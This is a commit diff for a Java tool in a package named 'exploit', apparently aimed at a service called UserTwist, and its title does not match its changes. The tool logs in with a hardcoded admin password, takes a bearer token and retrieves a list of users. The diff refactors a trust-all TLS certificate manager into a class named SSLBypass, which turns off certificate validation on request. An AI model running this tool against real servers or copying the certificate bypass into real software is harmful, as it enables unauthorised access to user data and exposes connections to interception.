Simplified elapsed time calculating

.idea/git_toolbox_blame.xml

@@ -1,6 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project version="4">
-  <component name="GitToolBoxBlameSettings">
-    <option name="version" value="2" />
-  </component>
-</project>

src/fr/motysten/usertwist/exploit/Main.java

@@ -24,14 +24,12 @@ public class Main {
     public static String password = "AdminSecret1C";
     public static String port = "443";
     public static int rotation = 4;
+    public static boolean insecure = false;
     public static boolean asynchronous = true;
-    public static Request requestClient;
 
     public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
         BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
 
-        requestClient = new Request(false);
-
         if (Arrays.asList(args).contains("--synchronous") || Arrays.asList(args).contains("-s")) {
             asynchronous = false;
         }
@@ -71,7 +69,7 @@ public class Main {
         boolean tokenFound = false;
         while (!tokenFound) {
             try {
-                response = requestClient.get(link, port, "/login", requestJSON, null);
+                response = Request.get(link, port, "/login", requestJSON, null, insecure);
                 if (response.statusCode() == 308) {
                     System.err.println("The server is trying to force HTTPS use. Would you like to retry with HTTPS ? [Y/n]");
                     if (reader.readLine().equalsIgnoreCase("n")) {
@@ -90,7 +88,7 @@ public class Main {
                     System.err.println("Operation aborted ! Security failure.");
                     System.exit(1);
                 } else {
-                    requestClient = new Request(true);
+                    insecure = true;
                 }
             } catch (SSLException e) {
                 if (e.getMessage().contains("plaintext connection?")) {
@@ -110,6 +108,8 @@ public class Main {
             System.exit(1);
         }
 
+        System.out.println(response.statusCode());
+
         JSONObject responseObject = new JSONObject(response.body());
         String token = responseObject.optString("token");
 
@@ -124,7 +124,7 @@ public class Main {
         Map<String, String> headers = new HashMap<>();
         headers.put("Authorization", "Bearer " + token);
 
-        response = requestClient.get(link, port, "/references", requestJSON, headers);
+        response = Request.get(link, port, "/references", requestJSON, headers, insecure);
         JSONArray usersArray = new JSONArray(response.body());
 
         System.out.println(usersArray.length() + " users found !");

src/fr/motysten/usertwist/exploit/tools/Request.java

@@ -3,11 +3,8 @@ package fr.motysten.usertwist.exploit.tools;
 import org.json.JSONObject;
 
 import javax.net.ssl.SSLContext;
-import javax.net.ssl.SSLEngine;
 import javax.net.ssl.TrustManager;
-import javax.net.ssl.X509ExtendedTrustManager;
 import java.io.IOException;
-import java.net.Socket;
 import java.net.URI;
 import java.net.http.HttpClient;
 import java.net.http.HttpRequest;
@@ -15,59 +12,20 @@ import java.net.http.HttpResponse;
 import java.security.KeyManagementException;
 import java.security.NoSuchAlgorithmException;
 import java.security.SecureRandom;
-import java.security.cert.X509Certificate;
 import java.util.Map;
 
 public class Request {
 
-    private final HttpClient client;
+    public static HttpResponse<String> get(String link, String port, String endpoint,JSONObject params, Map<String, String> headers, boolean insecure) throws NoSuchAlgorithmException, KeyManagementException, IOException, InterruptedException {
+        HttpClient client = HttpClient.newHttpClient();
 
-    public Request(boolean insecure) throws NoSuchAlgorithmException, KeyManagementException {
-        HttpClient.Builder builder = HttpClient.newBuilder();
         if (insecure) {
             SSLContext customContext = SSLContext.getInstance("TLS");
-            customContext.init(null, new TrustManager[]{new X509ExtendedTrustManager() {
-                @Override
-                public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+            customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
 
-                }
-
-                @Override
-                public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
-
-                }
-
-                @Override
-                public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
-
-                }
-
-                @Override
-                public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
-
-                }
-
-                @Override
-                public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
-
-                }
-
-                @Override
-                public void checkServerTrusted(X509Certificate[] x509Certificates, String s) {
-
-                }
-
-                @Override
-                public X509Certificate[] getAcceptedIssuers() {
-                    return new X509Certificate[0];
-                }
-            }}, new SecureRandom());
-            builder.sslContext(customContext);
+            client = HttpClient.newBuilder().sslContext(customContext).build();
         }
-        this.client = builder.build();
-    }
 
-    public HttpResponse<String> get(String link, String port, String endpoint,JSONObject params, Map<String, String> headers) throws IOException, InterruptedException {
         HttpRequest.Builder builder = HttpRequest.newBuilder(URI.create(link + ":" + port + endpoint));
         if (headers != null) {
             for (Map.Entry<String, String> header : headers.entrySet()) {

src/fr/motysten/usertwist/exploit/tools/SSLBypass.java

@@ -0,0 +1,43 @@
+package fr.motysten.usertwist.exploit.tools;
+
+import javax.net.ssl.SSLEngine;
+import javax.net.ssl.X509ExtendedTrustManager;
+import java.net.Socket;
+import java.security.cert.X509Certificate;
+
+public class SSLBypass extends X509ExtendedTrustManager {
+    @Override
+    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+    }
+
+    @Override
+    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+    }
+
+    @Override
+    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+    }
+
+    @Override
+    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+    }
+
+    @Override
+    public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
+
+    }
+
+    @Override
+    public void checkServerTrusted(X509Certificate[] x509Certificates, String s)  {
+
+    }
+
+    @Override
+    public X509Certificate[] getAcceptedIssuers() {
+        return new X509Certificate[0];
+    }
+}